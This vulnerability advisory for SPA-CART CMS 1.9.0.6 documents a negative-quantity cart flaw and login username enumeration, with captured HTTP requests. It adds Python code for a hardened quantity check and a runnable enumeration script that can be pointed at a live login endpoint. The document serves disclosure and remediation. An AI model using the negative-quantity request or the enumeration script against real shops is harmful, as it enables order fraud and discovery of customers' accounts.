Headline
SPA-CART CMS 1.9.0.6 Username Enumeration / Business Logic Flaw
SPA-CART CMS version 1.9.0.6 suffers from business logic and user enumeration flaws.
Exploit Title: Business Logic Flaw and Username Enumeration in spa-cart CMS v1.9.0.6
Date: 6/2024
Exploit Author: Andrey Stoykov
Version: 1.9.0.6
Tested on: Ubuntu 22.04
Blog:
https://msecureltd.blogspot.com/2024/04/friday-fun-pentest-series-5-spa.html
http://msecureltd.blogspot.com/
Description
The application accepts a negative quantity when a product is added to the cart, so the checkout total can be driven to a negative value (business logic flaw).
Additionally, the login page returns a different response body for a registered e-mail address than for an unregistered one, which allows username enumeration.
Logic Flaw
Steps to Reproduce:
- Add a product to the cart and intercept the HTTP POST request to /cart/add
- Change the amount parameter to a negative quantity such as -10
- The server accepts the value; the checkout page then shows the line total as a negative amount (59.00 x -10 = -590.00)
Note that the add-to-cart confirmation still reports "Qty: 1", while the checkout page shows the stored quantity of -10, so the confirmation message does not reflect what was actually written to the cart.
// HTTP POST request modifying the quantity to negative value
POST /cart/add HTTP/2
Host: demo.spa-cart.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/123.0.6312.122
[…]
productid=225&amount=-10
// HTTP response
HTTP/2 200 OK
Server: nginx
[…]
[…]
<img src="https://demo.spa-cart.com/var/photo/product/234x200/225/695/1.jpg"
alt="" /><b>Five And Two Jewelry Piper Gold-Plated Earrings</b> added to
cart
<br /><br />
<strong class="added_price">Price: <span><span
class="currency">$</span>59.00</span></strong>
<div class="added_options">
<b>Selected options:</b>
Qty: 1<br />
Color: silver gold<br />
</div>
[…]
// HTTP GET request to checkout
GET /checkout HTTP/2
Host: demo.spa-cart.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/123.0.6312.122
[…]
// HTTP response showing negative amount owed
HTTP/2 200 OK
Server: nginx
[…]
[…]
<td>silver gold</td>
</tr>
</table>
</td>
<td class="line" nowrap align="right">
<span class="currency">$</span>59.00 x -10 =
<span class="currency">$</span>-590.00 </td>
[…]
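The root cause is that the amount parameter is used as the cart quantity without any server-side validation. The following Python example is added here to illustrate the fix; it is not code from spa-cart CMS (which is not written in Python) and the catalogue, the MAX_QTY bound and the handler shape are constructed for the example. It shows the observed behaviour beside a hardened version that only accepts a bounded positive integer and recomputes the order total at checkout from the catalogue price.

```python
import re
from decimal import Decimal
from typing import Dict, Iterable, Tuple

# Constructed catalogue for the example; product 225 is the $59.00 item seen in
# the captured exchange. Hypothetical data, not read from the application.
CATALOGUE: Dict[str, Decimal] = {"225": Decimal("59.00")}

MAX_QTY = 999  # hypothetical upper bound; a real shop derives this from stock rules


class CartError(ValueError):
    """Raised when a cart line or order fails validation."""


def vulnerable_line_total(productid: str, amount: str) -> Decimal:
    """Mirror of the observed behaviour: the quantity is taken from the request
    as-is, so amount=-10 yields 59.00 x -10 = -590.00."""
    return CATALOGUE[productid] * int(amount)


def parse_quantity(raw: str) -> int:
    """Hardened parser: only an ASCII positive integer within bounds is accepted.
    Rejects '-10', '+10', '10.0', '1e3', '' and non-ASCII digit characters."""
    raw = raw.strip()
    if not re.fullmatch(r"[0-9]+", raw):
        raise CartError(f"quantity must be a positive whole number, got {raw!r}")
    qty = int(raw)
    if not 1 <= qty <= MAX_QTY:
        raise CartError(f"quantity {qty} outside allowed range 1..{MAX_QTY}")
    return qty


def hardened_line_total(productid: str, amount: str) -> Decimal:
    """Catalogue price x validated quantity; the price never comes from the client."""
    if productid not in CATALOGUE:
        raise CartError(f"unknown product {productid!r}")
    return CATALOGUE[productid] * parse_quantity(amount)


def add_to_cart(productid: str, amount: str) -> Dict[str, object]:
    """Handler-shaped wrapper for POST /cart/add: a validation error becomes a
    rejected response instead of a negative quantity stored in the cart."""
    try:
        total = hardened_line_total(productid, amount)
    except CartError as exc:
        return {"ok": False, "error": str(exc)}
    return {"ok": True, "line_total": str(total)}


def checkout_total(lines: Iterable[Tuple[str, str]]) -> Decimal:
    """Recompute the order total at checkout from catalogue prices and re-validated
    quantities; a non-positive total is refused even if a bad line slipped in earlier."""
    total = sum((hardened_line_total(p, a) for p, a in lines), Decimal("0"))
    if total <= 0:
        raise CartError("order total must be positive")
    return total


if __name__ == "__main__":
    print("vulnerable:", vulnerable_line_total("225", "-10"))
    print("hardened:", add_to_cart("225", "-10"))
    print("checkout:", checkout_total([("225", "2")]))
```

The check is applied twice on purpose: once when the line is added and again when the order total is computed, so a quantity altered through any other path (a later cart update, a replayed request) still cannot produce a negative or zero total.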
Username Enumeration:
Steps to Reproduce:
- Register an account
- Log in with the registered e-mail address and a wrong password, trapping the HTTP POST request to /login
- Check that the response for the valid username is the single character “P”
- Repeat with an e-mail address that is not registered and a wrong password
- Check that the response for the invalid username is the single character “E”
The two distinct responses let an attacker test any e-mail address for the existence of an account without knowing a password.
// HTTP POST request with valid username and wrong password
POST /login HTTP/2
Host: demo.spa-cart.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
[…]
email=test%40test.test&password=test123
// HTTP response showing “P” error message
HTTP/2 200 OK
Server: nginx
[…]
P
// HTTP POST request with invalid username and wrong password
POST /login HTTP/2
Host: demo.spa-cart.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
[…]
email=test%40test.t3st&password=test123
// HTTP response showing “E” error message
HTTP/2 200 OK
Server: nginx
[…]
E
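The “P”/“E” distinction is a clean oracle, so the check can be automated over a list of candidate addresses. The Python below is an added example, not part of the advisory or of spa-cart CMS: it classifies a login response body, wraps the captured POST /login form fields in a sender built on the standard library, and includes a constructed offline stand-in for the endpoint so the logic runs without a target. The hardened_login_message function is a hypothetical server-side fix for comparison, showing the single generic message that removes the oracle.

```python
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterable

# Response bodies observed on POST /login in the advisory: "P" for a registered
# e-mail with a wrong password, "E" for an e-mail that is not registered.
KNOWN_USER_MARKER = "P"
UNKNOWN_USER_MARKER = "E"

Sender = Callable[[str, str], str]  # (email, password) -> response body


def classify_login_response(body: str) -> str:
    """Map a login response body onto an oracle verdict."""
    token = body.strip()
    if token == KNOWN_USER_MARKER:
        return "exists"
    if token == UNKNOWN_USER_MARKER:
        return "unknown"
    return "undetermined"  # anything else: lockout, CAPTCHA, redirect, successful login


def http_sender(base_url: str, timeout: float = 10.0) -> Sender:
    """Build a sender that POSTs the same form fields as the captured request.
    No network traffic happens until the returned callable is invoked."""
    def send(email: str, password: str) -> str:
        data = urllib.parse.urlencode({"email": email, "password": password}).encode()
        req = urllib.request.Request(base_url.rstrip("/") + "/login", data=data, method="POST")
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read().decode("utf-8", errors="replace")
    return send


def constructed_sender(registered: Iterable[str]) -> Sender:
    """Offline stand-in for the vulnerable endpoint, constructed for this example:
    answers "P" for registered e-mails and "E" otherwise, ignoring the password."""
    known = {e.lower() for e in registered}
    return lambda email, password: KNOWN_USER_MARKER if email.lower() in known else UNKNOWN_USER_MARKER


def enumerate_accounts(candidates: Iterable[str], send: Sender,
                       password: str = "test123") -> Dict[str, str]:
    """Probe each candidate with a deliberately wrong password and record the verdict.
    The password never needs to be right: only the P/E distinction is used."""
    return {email: classify_login_response(send(email, password)) for email in candidates}


def hardened_login_message(user_exists: bool, password_ok: bool) -> str:
    """Hypothetical fixed server behaviour: one generic message for both failure
    causes, so the response body no longer reveals whether the e-mail is registered."""
    if user_exists and password_ok:
        return "OK"
    return "Invalid e-mail address or password"


if __name__ == "__main__":
    # Swap constructed_sender(...) for http_sender("https://demo.spa-cart.com") to probe live.
    send = constructed_sender(["test@test.test"])
    for email, verdict in enumerate_accounts(["test@test.test", "test@test.t3st"], send).items():
        print(f"{email}: {verdict}")
```

When verifying a fix, compare more than the body: a generic message is not enough if the status code, a redirect target, a cookie or the response time still differs between the two cases, and any live probing should be paced so that lockout or rate limiting does not turn the verdicts into "undetermined".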